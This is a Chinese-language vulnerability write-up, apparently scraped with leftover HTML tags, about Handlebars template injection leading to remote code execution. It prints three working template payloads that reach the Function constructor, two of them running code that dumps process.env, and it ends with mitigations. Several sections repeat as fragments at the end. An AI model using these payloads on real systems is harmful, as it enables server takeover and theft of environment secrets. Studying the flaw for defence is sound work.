Handlebars 模板注入导致 RCE 漏洞分析与利用<\/h1>

漏洞概述<\/h2>
Handlebars 是一个流行的 JavaScript 模板引擎，该漏洞允许攻击者通过模板注入实现远程代码执行(RCE)。漏洞核心在于 Handlebars 模板中可以访问 JavaScript 构造函数，通过巧妙的构造可以实现沙盒逃逸并执行任意代码。<\/p>

漏洞发现背景<\/h2>
该漏洞最初在 Shopify 的 "Return Magic" 应用中发现，该应用使用 Handlebars 作为模板引擎来处理电子邮件模板。攻击者可以通过注入恶意模板来获取服务器控制权。<\/p>

漏洞原理分析<\/h2>

基本注入点<\/h3>
Handlebars 模板中可以使用 `{{this}}<\/code> 表达式，当注入 {{this}}<\/code> 时返回 [object Object]<\/code>，这表明可以访问 JavaScript 对象原型链。<\/p>`

关键利用点<\/h3>

访问构造函数<\/strong>：通过 {{this.constructor}}<\/code> 可以访问 Object 构造函数<\/li>
访问 Function 构造函数<\/strong>：通过 {{this.constructor.constructor}}<\/code> 可以访问 Function 构造函数<\/li>
Helpers 函数特性<\/strong>：Handlebars 的 helpers 函数如 with<\/code> 可以改变模板上下文<\/li>
<\/ol>
利用难点<\/h3>

Handlebars 编译器会自动将模板范围内的 Object 添加为最后一个参数<\/li>
需要绕过 JavaScript 的沙盒限制<\/li>
需要处理函数调用时的额外参数问题<\/li>
<\/ol>
漏洞利用技术<\/h2>
方法一：重写 Object.prototype.toString<\/h3>
{{<\/span>#with<\/span> this as |<\/span>test|<\/span>}}<\/span>
<\/span><\/span>  {{<\/span>#with<\/span> (<\/span>test.constructor.getOwnPropertyDescriptor this "getStoreName"<\/span>)<\/span>}}<\/span>
<\/span><\/span>    {{<\/span>#with<\/span> (<\/span>test.constructor.defineProperty test.constructor.prototype "toString"<\/span> this)<\/span>}}<\/span>
<\/span><\/span>      {{<\/span>#with<\/span> (<\/span>test.constructor.constructor "test"<\/span>)<\/span>}}<\/span> {{<\/span>\/with<\/span>}}<\/span>
<\/span><\/span>    {{<\/span>\/with<\/span>}}<\/span>
<\/span><\/span>  {{<\/span>\/with<\/span>}}<\/span>
<\/span><\/span>{{<\/span>\/with<\/span>}}<\/span>
<\/span><\/span><\/code><\/pre>原理<\/strong>：<\/p>

获取一个返回可控字符串的函数的属性描述符<\/li>
用该描述符重写 Object.prototype.toString<\/li>
调用 Function 构造函数时，toString 会被调用，执行我们的代码<\/li>
<\/ol>
方法二：使用 bind() 函数<\/h3>
{{<\/span>#with<\/span> this as |<\/span>obj|<\/span>}}<\/span>
<\/span><\/span>    {{<\/span>#with<\/span> (<\/span>obj.constructor.keys "1"<\/span>)<\/span> as |<\/span>arr|<\/span>}}<\/span>
<\/span><\/span>        {{<\/span>arr.pop}}<\/span>
<\/span><\/span>        {{<\/span>arr.push obj.constructor.name.constructor.bind}}<\/span>
<\/span><\/span>        {{<\/span>arr.pop}}<\/span>
<\/span><\/span>        {{<\/span>arr.push "console.log(process.env)"<\/span>}}<\/span>
<\/span><\/span>        {{<\/span>arr.pop}}<\/span>
<\/span><\/span>            {{<\/span>#blockHelperMissing<\/span> obj.constructor.name.constructor.bind}}<\/span>
<\/span><\/span>              {{<\/span>#with<\/span> (<\/span>arr.constructor (<\/span>obj.constructor.name.constructor.bind.apply obj.constructor.name.constructor arr))<\/span>}}<\/span>
<\/span><\/span>                {{<\/span>#with<\/span> (<\/span>obj.constructor.getOwnPropertyDescriptor this 0<\/span>)<\/span>}}<\/span>
<\/span><\/span>                  {{<\/span>#with<\/span> (<\/span>obj.constructor.defineProperty obj.constructor.prototype "toString"<\/span> this)<\/span>}}<\/span>
<\/span><\/span>                     {{<\/span>#with<\/span> (<\/span>obj.constructor.constructor "test"<\/span>)<\/span>}}<\/span>
<\/span><\/span>                     {{<\/span>\/with<\/span>}}<\/span>
<\/span><\/span>                  {{<\/span>\/with<\/span>}}<\/span>
<\/span><\/span>                {{<\/span>\/with<\/span>}}<\/span>
<\/span><\/span>              {{<\/span>\/with<\/span>}}<\/span>
<\/span><\/span>            {{<\/span>\/blockHelperMissing<\/span>}}<\/span>
<\/span><\/span>  {{<\/span>\/with<\/span>}}<\/span>
<\/span><\/span>{{<\/span>\/with<\/span>}}<\/span>
<\/span><\/span><\/code><\/pre>原理<\/strong>：<\/p>

使用 bind() 创建一个新函数<\/li>
重写 Object.prototype.toString<\/li>
通过 Function 构造函数调用执行代码<\/li>
<\/ol>
方法三：简化版利用 (Matias 的方法)<\/h3>
{{<\/span>#with<\/span> "s"<\/span> as |<\/span>string|<\/span>}}<\/span>
<\/span><\/span>  {{<\/span>#with<\/span> "e"<\/span>}}<\/span>
<\/span><\/span>    {{<\/span>#with<\/span> split as |<\/span>conslist|<\/span>}}<\/span>
<\/span><\/span>      {{<\/span>this.pop}}<\/span>
<\/span><\/span>      {{<\/span>this.push (<\/span>lookup string.sub "constructor"<\/span>)<\/span>}}<\/span>
<\/span><\/span>      {{<\/span>this.pop}}<\/span>
<\/span><\/span>      {{<\/span>#with<\/span> string.split as |<\/span>codelist|<\/span>}}<\/span>
<\/span><\/span>        {{<\/span>this.pop}}<\/span>
<\/span><\/span>        {{<\/span>this.push "return JSON.stringify(process.env);"<\/span>}}<\/span>
<\/span><\/span>        {{<\/span>this.pop}}<\/span>
<\/span><\/span>        {{<\/span>#each<\/span> conslist}}<\/span>
<\/span><\/span>          {{<\/span>#with<\/span> (<\/span>string.sub.apply 0<\/span> codelist)<\/span>}}<\/span>
<\/span><\/span>            {{<\/span>this}}<\/span>
<\/span><\/span>          {{<\/span>\/with<\/span>}}<\/span>
<\/span><\/span>        {{<\/span>\/each<\/span>}}<\/span>
<\/span><\/span>      {{<\/span>\/with<\/span>}}<\/span>
<\/span><\/span>    {{<\/span>\/with<\/span>}}<\/span>
<\/span><\/span>  {{<\/span>\/with<\/span>}}<\/span>
<\/span><\/span>{{<\/span>\/with<\/span>}}<\/span>
<\/span><\/span><\/code><\/pre>防护措施<\/h2>

升级 Handlebars<\/strong>：npm 已发布补丁禁止访问构造函数<\/li>
输入过滤<\/strong>：对用户输入的模板内容进行严格过滤<\/li>
沙盒隔离<\/strong>：在安全的沙盒环境中执行模板渲染<\/li>
最小权限<\/strong>：模板渲染进程使用最小必要权限<\/li>
<\/ol>
总结<\/h2>
该漏洞展示了模板引擎中允许访问底层语言特性的危险性。通过巧妙的构造，攻击者可以利用 JavaScript 的原型链和函数特性实现沙盒逃逸。开发者在选择和使用模板引擎时应当充分了解其安全特性，并采取适当的防护措施。<\/p>
参考<\/h2>

Handlebars 安全公告<\/a><\/li>
原始漏洞分析文章<\/a><\/li>
<\/ul>

Handlebars 模板注入导致 RCE 漏洞分析与利用<\/h1>

漏洞发现背景<\/h2> 该漏洞最初在 Shopify 的 "Return Magic" 应用中发现，该应用使用 Handlebars 作为模板引擎来处理电子邮件模板。攻击者可以通过注入恶意模板来获取服务器控制权。<\/p>

漏洞原理分析<\/h2>

基本注入点<\/h3> Handlebars 模板中可以使用 {{this}}<\/code> 表达式，当注入 {{this}}<\/code> 时返回 [object Object]<\/code>，这表明可以访问 JavaScript 对象原型链。<\/p>

漏洞利用技术<\/h2>

参考<\/h2> Handlebars 安全公告<\/a><\/li> 原始漏洞分析文章<\/a><\/li> <\/ul>

漏洞发现背景<\/h2>
该漏洞最初在 Shopify 的 "Return Magic" 应用中发现，该应用使用 Handlebars 作为模板引擎来处理电子邮件模板。攻击者可以通过注入恶意模板来获取服务器控制权。<\/p>

基本注入点<\/h3>
Handlebars 模板中可以使用 `{{this}}<\/code> 表达式，当注入 {{this}}<\/code> 时返回 [object Object]<\/code>，这表明可以访问 JavaScript 对象原型链。<\/p>`

参考<\/h2>

Handlebars 安全公告<\/a><\/li>
原始漏洞分析文章<\/a><\/li> <\/ul>